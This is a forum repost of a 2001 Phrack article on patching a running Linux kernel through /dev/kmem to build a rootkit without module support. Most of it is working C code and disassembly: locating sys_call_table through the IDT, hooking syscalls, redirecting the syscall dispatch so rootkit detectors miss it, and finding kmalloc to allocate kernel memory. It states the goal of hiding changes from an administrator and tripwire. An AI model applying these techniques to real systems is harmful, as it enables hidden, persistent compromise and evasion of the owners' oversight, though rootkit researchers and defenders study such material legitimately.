- 论坛徽章:
- 0
|
When you are feeling weary small,we will comfort you!
Linux on-the-fly kernel patching without LKM
==Phrack Inc.==
Volume 0x0b, Issue 0x3a, Phile #0x07 of 0x0e
|=----------=[ Linux on-the-fly kernel patching without LKM ]=-----------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ sd <sd@sf.cz>, devik <devik@cdi.cz> ]=---------------=|
|=----------------------=[ December 12th 2001 ]=-------------------------=|
--[ Contents
1 - Introduction
2 - /dev/kmem is our friend
3 - Replacing kernel syscalls, sys_call_table[]
3.1 - How to get sys_call_table[] without LKM ?
3.2 - Redirecting int 0x80 call sys_call_table[eax] dispatch
4 - Allocating kernel space without help of LKM support
4.1 - Searching kmalloc() using LKM support
4.2 - pattern search of kmalloc()
4.3 - The GFP_KERNEL value
4.4 - Overwriting a syscall
5 - What you should take care of
6 - Possible solutions
7 - Conclusion
8 - References
9 - Appendix: SucKIT: The implementation
※※※※※1 - Introduction
In the beginning, we must thank Silvio Cesare, who developed the
technique of kernel patching a long time ago, most of ideas was stolen
from him.
In this paper, we will discuss way of abusing the Linux kernel
(syscalls mostly) without help of module support or System.map at all,
so that we assume that the reader will have a clue about what LKM is,
how a LKM is loaded into kernel etc. If you are not sure, look at some
documentation (paragraph 6. [1], [2], [3])
Imagine a scenario of a poor man which needs to change some interesting
linux syscall and LKM support is not compiled in. Imagine he have got a
box, he got root but the admin is so paranoid and he (or tripwire) don't
poor man's patched sshd and that box have not gcc/lib/.h
needed for compiling of his favourite LKM rootkit. So there are
some solutions, step by step and as an appendix, a full-featured
linux-ia32 rootkit, an example/tool, which implements all the techinques
described here.
Most of things described there (such as syscalls, memory addressing
schemes ... code too) can work only on ia32 architecture. If someone
investigate(d) to other architectures, please contact us.
※※※※※--[ 2 - /dev/kmem is our friend
"Mem is a character device file that is an image of the main memory of
the computer. It may be used, for example, to examine (and even patch)
the system."
-- from the Linux 'mem' man page
For full and complex documentation about run-time kernel patching take a
look at excellent Silvio's article about this subject [2].
Just in short:
Everything we do in this paper with kernel space is done using the
standard linux device, /dev/kmem. Since this device is mostly +rw only for
root, you must be root too if you want to abuse it.
Note that changing of /dev/kmem permission to gain access is not
sufficient. After /dev/kmem access is allowed by VFS then there is second
check in device/char/mem.c for capable(CAP_SYS_RAWIO) of process.
We should also note that there is another device, /dev/mem.
It is physical memory before VM translation. It might be possible to use it
if we were know page directory location. We didn't investigate this
possibility.
Selecting address is done through lseek(), reading using read() and
writing with help of write() ... simple.
There are some helpful functions for working with kernel stuff:
CODE
/* read data from kmem */
static inline int rkm(int fd, int offset, void *buf, int size)
{
if (lseek(fd, offset, 0) != offset) return 0;
if (read(fd, buf, size) != size) return 0;
return size;
}
/* write data to kmem */
static inline int wkm(int fd, int offset, void *buf, int size)
{
if (lseek(fd, offset, 0) != offset) return 0;
if (write(fd, buf, size) != size) return 0;
return size;
}
/* read int from kmem */
static inline int rkml(int fd, int offset, ulong *buf)
{
return rkm(fd, offset, buf, sizeof(ulong));
}
/* write int to kmem */
static inline int wkml(int fd, int offset, ulong buf)
{
return wkm(fd, offset, &buf, sizeof(ulong));
}
※※※※--[ 3 - Replacing kernel syscalls, sys_call_table[]
As we all know, syscalls are the lowest level of system functions (from
viewpoint of userspace) in Linux, so we'll be interested mostly in them.
Syscalls are grouped together in one big table (sct), it is just a
one-dimension array of 256 ulongs (=pointers, on ia32 architecture),
where indexing the array by a syscall number gives us the entrypoint of
given syscall. That's it.
An example pseudocode:
/* as everywhere, "Hello world" is good for begginers */
/* our saved original syscall */
int (*old_write) (int, char *, int);
/* new syscall handler */
new_write(int fd, char *buf, int count) {
if (fd == 1) { /* stdout ? */
old_write(fd, "Hello world!\n", 13);
return count;
} else {
return old_write(fd, buf, count);
}
}
old_write = (void *) sys_call_table[__NR_write]; /* save old */
sys_call_table[__NR_write] = (ulong) new_write; /* setup new one */
/* Err... there should be better things to do instead fucking up console
with "Hello worlds" */
This is the classic scenario of a various LKM rootkits (see paragraph 7),
tty sniffers/hijackers (the halflife's one, f.e. [4]) where it is guaranted
that we can import sys_call_table[] and manipulate it in a correct manner,
i.e. it is simply "imported" by /sbin/insmod
[ using create_module() / init_module() ]
Uhh, let's stop talking about nothing, we think this is clear enough for
everybody.
--[ 3.1 - How to get sys_call_table[] without LKM
At first, note that the Linux kernel _doesn not keep_ any kinda of
information about it's symbols in case when there is no LKM support
compiled in. It is rather a clever decision because why could someone need
it without LKM ? For debugging ? You have System.map instead. Well WE need
it With LKM support there are symbols intended to be imported into LKMs
(in their special linker section), but we said without LKM, right ?
As far we know, the most elegant way how to obtain sys_call_table[] is:
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
struct {
unsigned short limit;
unsigned int base;
} __attribute__ ((packed)) idtr;
struct {
unsigned short off1;
unsigned short sel;
unsigned char none,flags;
unsigned short off2;
} __attribute__ ((packed)) idt;
int kmem;
void readkmem (void *m,unsigned off,int sz)
{
if (lseek(kmem,off,SEEK_SET)!=off) {
perror("kmem lseek" exit(2);
}
if (read(kmem,m,sz)!=sz) {
perror("kmem read" exit(2);
}
}
#define CALLOFF 100 /* we'll read first 100 bytes of int $0x80*/
main ()
{
unsigned sys_call_off;
unsigned sct;
char sc_asm[CALLOFF],*p;
/* well let's read IDTR */
asm ("sidt %0" : "=m" (idtr));
printf("idtr base at 0x%X\n",(int)idtr.base);
/* now we will open kmem */
kmem = open ("/dev/kmem",O_RDONLY);
if (kmem<0) return 1;
/* read-in IDT for 0x80 vector (syscall) */
readkmem (&idt,idtr.base+8*0x80,sizeof(idt));
sys_call_off = (idt.off2 << 16) | idt.off1;
printf("idt80: flags=%X sel=%X off=%X\n",
(unsigned)idt.flags,(unsigned)idt.sel,sys_call_off);
/* we have syscall routine address now, look for syscall table
dispatch (indirect call) */
readkmem (sc_asm,sys_call_off,CALLOFF);
p = (char*)memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);
sct = *(unsigned*)(p+3);
if (p) {
printf ("sys_call_table at 0x%x, call dispatch at 0x%x\n",
sct, p);
}
close(kmem);
}
How it works ? The sidt instruction "asks the processor" for the interrupt
descriptor table [asm ("sidt %0" : "=m" (idtr));], from
this structure we will get a pointer to the interrupt descriptor of
int $0x80 [readkmem (&idt,idtr.base+8*0x80,sizeof(idt));].
>From the IDT we can compute the address of int $0x80's entrypoint
[sys_call_off = (idt.off2 << 16) | idt.off1;]
Good, we know where int $0x80 began, but that is not our loved
sys_call_table[]. Let's take a look at the int $0x80 entrypoint:
[sd@pikatchu linux]$ gdb -q /usr/src/linux/vmlinux
(no debugging symbols found)...(gdb) disass system_call
Dump of assembler code for function system_call:
0xc0106bc8 <system_call>: push %eax
0xc0106bc9 <system_call+1>: cld
0xc0106bca <system_call+2>: push %es
0xc0106bcb <system_call+3>: push %ds
0xc0106bcc <system_call+4>: push %eax
0xc0106bcd <system_call+5>: push %ebp
0xc0106bce <system_call+6>: push %edi
0xc0106bcf <system_call+7>: push %esi
0xc0106bd0 <system_call+8>: push %edx
0xc0106bd1 <system_call+9>: push %ecx
0xc0106bd2 <system_call+10>: push %ebx
0xc0106bd3 <system_call+11>: mov $0x18,%edx
0xc0106bd8 <system_call+16>: mov %edx,%ds
0xc0106bda <system_call+18>: mov %edx,%es
0xc0106bdc <system_call+20>: mov $0xffffe000,%ebx
0xc0106be1 <system_call+25>: and %esp,%ebx
0xc0106be3 <system_call+27>: cmp $0x100,%eax
0xc0106be8 <system_call+32>: jae 0xc0106c75 <badsys>
0xc0106bee <system_call+38>: testb $0x2,0x18(%ebx)
0xc0106bf2 <system_call+42>: jne 0xc0106c48 <tracesys>
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4) <-- that's it
0xc0106bfb <system_call+51>: mov %eax,0x18(%esp,1)
0xc0106bff <system_call+55>: nop
End of assembler dump.
(gdb) print &sys_call_table
$1 = (<data variable, no debug info> *) 0xc01e0f18 <-- see ? it's same
(gdb) x/xw (system_call+44)
0xc0106bf4 <system_call+44>: 0x188514ff <-- opcode (little endian)
(gdb)
In short, near to beginning of int $0x80 entrypoint is
'call sys_call_table(,eax,4)' opcode, because this indirect call does not
vary between kernel versions (it is same on 2.0.10 => 2.4.10), it's
relatively safe to search just for pattern of 'call <something>(,eax,4)'
opcode = 0xff 0x14 0x85 0x<address_of_table>
[memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);]
Being paranoid, one could do a more robust hack. Simply redirect whole
int $0x80 handler in IDT to our fake handler and intercept interesting
calls here. It is a bit more complicated as we would have to handle
reentrancy ...
At this time, we know where sys_call_table[] is and we can change the
address of some syscalls:
Pseudocode:
readkmem(&old_write, sct + __NR_write * 4, 4); /* save old */
writekmem(new_write, sct + __NR_write * 4, 4); /* set new */
--[ 3.2 - Redirecting int $0x80 call sys_call_table[eax] dispatch
When writing this article, we found some "rootkit detectors"
on Packetstorm/Freshmeat. They are able to detect the fact that
something is wrong with a LKM/syscalltable/other kernel
stuff...fortunately, most of them are too stupid and can be simply
fooled by the the trick introduced in [6] by SpaceWalker:
Pseudocode:
ulong sct = addr of sys_call_table[]
char *p = ptr to int 0x80's call sct(,eax,4) - dispatch
ulong nsct[256] = new syscall table with modified entries
readkmem(nsct, sct, 1024); /* read old */
old_write = nsct[__NR_write];
nsct[__NR_write] = new_write;
/* replace dispatch to our new sct */
writekmem((ulong) p+3, nsct, 4);
/* Note that this code never can work, because you can't
redirect something kernel related to userspace, such as
sct[] in this case */
Background:
We create a copy of the original sys_call_table[] [readkmem(nsct, sct,
1024);], then we will modify entries which we're interested in [old_write =
nsct[__NR_write]; nsct[__NR_write] = new_write;] and then change _only_
addr of <something> in the call <something>(,eax,4):
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4)
~~~~|~~~~~
|__ Here will be address of
_our_ sct[]
LKM detectors (which does not check consistency of int $0x80) won't see
anything, sys_call_table[] is the same, but int $0x80 uses our implanted
table.
--[ 4 - Allocating kernel space without help of LKM support
Next thing that we need is a memory page above the 0xc0000000
(or 0x80000000) address.
The 0xc0000000 value is demarcation point between user and kernel memory.
User processes have not access above the limit. Take into account
that this value is not exact, and may be different, so it is good idea
to figure out the limit on the fly (from int $0x80's entrypoint).
Well, how to get our page above the limit ? Let's take a look how regular
kernel LKM support does it (/usr/src/linux/kernel/module.c):
...
void inter_module_register(const char *im_name, struct module *owner,
const void *userdata)
{
struct list_head *tmp;
struct inter_module_entry *ime, *ime_new;
if (!(ime_new = kmalloc(sizeof(*ime), GFP_KERNEL))) {
/* Overloaded kernel, not fatal */
...
As we expected, they used kmalloc(size, GFP_KERNEL) ! But we can't use
kmalloc() yet because:
- We don't know the address of kmalloc() [ paragraph 4.1, 4.2 ]
- We don't know the value of GFP_KERNEL [ paragraph 4.3 ]
- We can't call kmalloc() from user-space [ paragraph 4.4 ]
--[ 4.1 - Searching for kmalloc() using LKM support
If we can use LKM support:
/* kmalloc() lookup */
/* simplest & safest way, but only if LKM support is there */
ulong get_sym(char *n) {
struct kernel_sym tab[MAX_SYMS];
int numsyms;
int i;
numsyms = get_kernel_syms(NULL);
if (numsyms > MAX_SYMS || numsyms < 0) return 0;
get_kernel_syms(tab);
for (i = 0; i < numsyms; i++) {
if (!strncmp(n, tab.name, strlen(n)))
return tab.value;
}
return 0;
}
ulong get_kma(ulong pgoff)
{
ret = get_sym("kmalloc"
if (ret) return ret;
return 0;
}
We leave this without comments.
--[ 4.2 - pattern search of kmalloc()
But if LKM is not there, were getting into troubles. The solution
is quite dirty, and not-so-good by the way, but it seem to work.
We'll walk through kernel's .text section and look for patterns such as:
push GFP_KERNEL <something between 0-0xffff>
push size <something between 0-0x1ffff>
call kmalloc
All info will be gathered into a table, sorted and the function called most
times will be our kmalloc(), here is code:
/* kmalloc() lookup */
#define RNUM 1024
ulong get_kma(ulong pgoff)
{
struct { uint a,f,cnt; } rtab[RNUM], *t;
uint i, a, j, push1, push2;
uint found = 0, total = 0;
uchar buf[0x10010], *p;
int kmem;
ulong ret;
/* uhh, before we try to brute something, attempt to do things
in the *right* way ) */
ret = get_sym("kmalloc"
if (ret) return ret;
/* humm, no way ) */
kmem = open(KMEM_FILE, O_RDONLY, 0);
if (kmem < 0) return 0;
for (i = (pgoff + 0x100000); i < (pgoff + 0x1000000);
i += 0x10000) {
if (!loc_rkm(kmem, buf, i, sizeof(buf))) return 0;
/* loop over memory block looking for push and calls */
for (p = buf; p < buf + 0x10000 {
switch (*p++) {
case 0x68:
push1 = push2;
push2 = *(unsigned*)p;
p += 4;
continue;
case 0x6a:
push1 = push2;
push2 = *p++;
continue;
case 0xe8:
if (push1 && push2 &&
push1 <= 0xffff &&
push2 <= 0x1ffff) break;
default:
push1 = push2 = 0;
continue;
}
/* we have push1/push2/call seq; get address */
a = *(unsigned *) p + i + (p - buf) + 4;
p += 4;
total++;
/* find in table */
for (j = 0, t = rtab; j < found; j++, t++)
if (t->a == a && t->f == push1) break;
if (j < found)
t->cnt++;
else
if (found >= RNUM) {
return 0;
}
else {
found++;
t->a = a;
t->f = push1;
t->cnt = 1;
}
push1 = push2 = 0;
} /* for (p = buf; ... */
} /* for (i = (pgoff + 0x100000) ...*/
close(kmem);
t = NULL;
for (j = 0;j < found; j++) /* find a winner */
if (!t || rtab[j].cnt > t->cnt) t = rtab+j;
if (t) return t->a;
return 0;
}
The code above is a simple state machine and it doesn't bother itself with
potentionaly different asm code layout (when you use some exotic GCC
options). It could be extended to understand different code patterns (see
switch statement) and can be made more accurate by checking GFP value in
PUSHes against known patterns (see paragraph bellow).
The accuracy of this code is about 80% (i.e. 80% points to kmalloc, 20% to
some junk) and seem to work on 2.2.1 => 2.4.13 ok.
--[ 4.3 The GFP_KERNEL value
Next problem we get while using kmalloc() is the fact that value of
GFP_KERNEL varies between kernel series, but we can get rid of it
by help of uname()
+-----------------------------------+
| kernel version | GFP_KERNEL value |
+----------------+------------------+
| 1.0.x .. 2.4.5 | 0x3 |
+----------------+------------------+
| 2.4.6 .. 2.4.x | 0x1f0 |
+----------------+------------------+
Note that there is some troubles with 2.4.7-2.4.9 kernels, which
sometimes crashes due to bad GFP_KERNEL, simply because
the table above is not exact, it only shows values we CAN use.
The code:
#define NEW_GFP 0x1f0
#define OLD_GFP 0x3
/* uname struc */
struct un {
char sysname[65];
char nodename[65];
char release[65];
char version[65];
char machine[65];
char domainname[65];
};
int get_gfp()
{
struct un s;
uname(&s);
if ((s.release[0] == '2') && (s.release[2] == '4') &&
(s.release[4] >= '6' ||
(s.release[5] >= '0' && s.release[5] <= '9'))) {
return NEW_GFP;
}
return OLD_GFP;
}
--[ 4.3 - Overwriting a syscall
As we mentioned above, we can't call kmalloc() from user-space directly,
solution is Silvio's trick [2] of replacing syscall:
1. Get address of some syscall
(IDT -> int 0x80 -> sys_call_table)
2. Create a small routine which will call kmalloc() and return
pointer to allocated page
3. Save sizeof(our_routine) bytes of some syscall
4. Overwrite code of some syscall by our routine
5. Call this syscall from userspace thru int $0x80, so
our routine will operate in kernel context and
can call kmalloc() for us passing out the
address of allocated memory as return value.
6. Restore code of some syscall with saved bytes (in step 3.)
our_routine may look as something like that:
struct kma_struc {
ulong (*kmalloc) (uint, int);
int size;
int flags;
ulong mem;
} __attribute__ ((packed));
int our_routine(struct kma_struc *k)
{
k->mem = k->kmalloc(k->size, k->flags);
return 0;
} |
|